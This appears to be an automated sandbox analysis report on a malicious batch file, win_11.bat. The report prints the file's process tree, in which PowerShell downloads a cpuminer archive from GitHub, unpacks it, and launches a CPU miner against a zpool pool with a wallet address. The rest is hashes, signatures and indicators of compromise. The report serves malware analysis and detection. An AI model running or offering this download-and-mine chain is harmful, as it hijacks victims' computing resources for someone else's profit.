Overview
overview
10Static
static
1win.bat
windows10-1703-x64
10win_1.bat
windows10-1703-x64
10win_10.bat
windows10-1703-x64
10win_11.bat
windows10-1703-x64
10win_2.bat
windows10-1703-x64
10win_3.bat
windows10-1703-x64
10win_4.bat
windows10-1703-x64
10win_5.bat
windows10-1703-x64
10win_6.bat
windows10-1703-x64
10win_7.bat
windows10-1703-x64
10win_8.bat
windows10-1703-x64
10win_9.bat
windows10-1703-x64
10Analysis
-
max time kernel
1798s -
max time network
1780s -
platform
windows10-1703_x64 -
resource
win10-20230621-en -
resource tags
arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system -
submitted
30-06-2023 14:47
Static task
static1
Behavioral task
behavioral1
Sample
win.bat
Resource
win10-20230621-en
Behavioral task
behavioral2
Sample
win_1.bat
Resource
win10-20230621-en
Behavioral task
behavioral3
Sample
win_10.bat
Resource
win10-20230621-en
Behavioral task
behavioral4
Sample
win_11.bat
Resource
win10-20230621-en
Behavioral task
behavioral5
Sample
win_2.bat
Resource
win10-20230621-en
Behavioral task
behavioral6
Sample
win_3.bat
Resource
win10-20230621-en
Behavioral task
behavioral7
Sample
win_4.bat
Resource
win10-20230621-en
Behavioral task
behavioral8
Sample
win_5.bat
Resource
win10-20230621-en
Behavioral task
behavioral9
Sample
win_6.bat
Resource
win10-20230621-en
Behavioral task
behavioral10
Sample
win_7.bat
Resource
win10-20230621-en
Behavioral task
behavioral11
Sample
win_8.bat
Resource
win10-20230621-en
Behavioral task
behavioral12
Sample
win_9.bat
Resource
win10-20230621-en
General
-
Target
win_11.bat
-
Size
706B
-
MD5
ddc05c409f627a4382bff4c3a49423df
-
SHA1
0f77ae481593bc1b0669dae7a044d0b96f39413f
-
SHA256
6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887
-
SHA512
0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3
Malware Config
Extracted
https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 372 powershell.exe 4 372 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4372 cpuminer-sse2.exe -
resource yara_rule behavioral4/files/0x000600000001af5d-277.dat upx behavioral4/files/0x000600000001af5d-278.dat upx behavioral4/memory/4372-279-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-280-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-281-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-282-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-283-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-284-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-285-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-287-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-288-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-289-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-291-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-292-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-293-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-294-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-295-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-296-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-298-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-301-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-302-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-305-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-307-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-308-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-309-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-310-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-311-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-312-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-313-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-314-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-315-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-316-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-317-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-318-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-320-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-321-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-322-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-323-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-326-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-328-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-329-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-333-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-334-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-335-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-336-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-337-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-338-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-340-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx behavioral4/memory/4372-343-0x00007FF74F3A0000-0x00007FF74FA1D000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 372 powershell.exe 372 powershell.exe 372 powershell.exe 1364 powershell.exe 1364 powershell.exe 1364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeLockMemoryPrivilege 4372 cpuminer-sse2.exe Token: SeLockMemoryPrivilege 4372 cpuminer-sse2.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4696 wrote to memory of 372 4696 cmd.exe 67 PID 4696 wrote to memory of 372 4696 cmd.exe 67 PID 4696 wrote to memory of 1364 4696 cmd.exe 68 PID 4696 wrote to memory of 1364 4696 cmd.exe 68 PID 4696 wrote to memory of 4372 4696 cmd.exe 69 PID 4696 wrote to memory of 4372 4696 cmd.exe 69
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_11.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe.\cpuminer-sse2.exe -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u oHyVvSQ3HDCgrM7MSJNzWmisqohcssm15C -p -c=OMEGA2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD51c13dd6d305ebb42255b5a18ab5993f7
SHA1a3b0fc331de0a478ebbff869e73bf38ad68d34dd
SHA25689046e3cb34f0e2bb8c56478403875eb5301c6e2ad16e5ea5a1e48aff9e73b05
SHA512219c986318c21489c40a22c5125b8a11b61c5abdb1d2445c9c4f34ca6ae4419f766c288f2dc8b474159ffebf00c1c864025c32a6cee80583d26d9a0a24a53963
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
20.9MB
MD599cc95c9ce13cf3da743e1d56dabe92d
SHA1e819db3b6ad4703fbc8535dadad3ad29d3cc2039
SHA256df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b
SHA512932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02
-
Filesize
2.6MB
MD5d136eb0fdd0e7826893f332c7fc3f7a2
SHA11e7fd635278e954eb0ee8cb951d16e4ecf60592f
SHA256993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26
SHA512895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757
-
Filesize
2.6MB
MD5d136eb0fdd0e7826893f332c7fc3f7a2
SHA11e7fd635278e954eb0ee8cb951d16e4ecf60592f
SHA256993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26
SHA512895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757